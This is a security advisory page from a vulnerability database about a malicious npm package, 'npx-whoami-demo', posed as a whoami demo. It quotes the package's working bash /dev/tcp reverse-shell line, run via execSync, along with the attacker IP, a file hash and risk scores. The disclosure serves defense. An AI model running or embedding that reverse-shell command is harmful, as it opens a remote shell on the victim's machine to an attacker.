VDB

GCVE-110-OSM-2026-5938

GCVE-110-OSM-2026-5938
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published June 15, 2026
This package contains a classic reverse shell payload in index.js: `bash -i >& /dev/tcp/101.43.232.7/7777 0>&1`, executed synchronously via `child_process.execSync` when the package is run via npx. The attacker model is straightforward — a victim running `npx npx-whoami-demo` gets a reverse shell connecting to the hardcoded attacker-controlled IP 101.43.232.7 on port 7777. The package description ('runs whoami') is a social engineering lure to encourage execution. Published by a brand-new account (ayoung2992 with qq.com email, one package, no history), consistent with a throwaway attacker account. ENTRY index.js (bin: ./index.js) ADDITIONAL FINDINGS - Shell Command Execution in index.js: "child_process").exec" - Brand New Package PAYLOAD FILES index.js INDICATORS (IOCs) - ipv4: 101.43.232.7 - payloadFileHash: e086d4eb615db23b2fc9dc9a01b6814bbd54c07e0e4e65b2cf8a9440adab5d3c

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownnpx-whoami-demoall (affected)

References

advisory
vendor

Browse GCVE Records

73,280 records in the GCVE database · Updated July 17, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›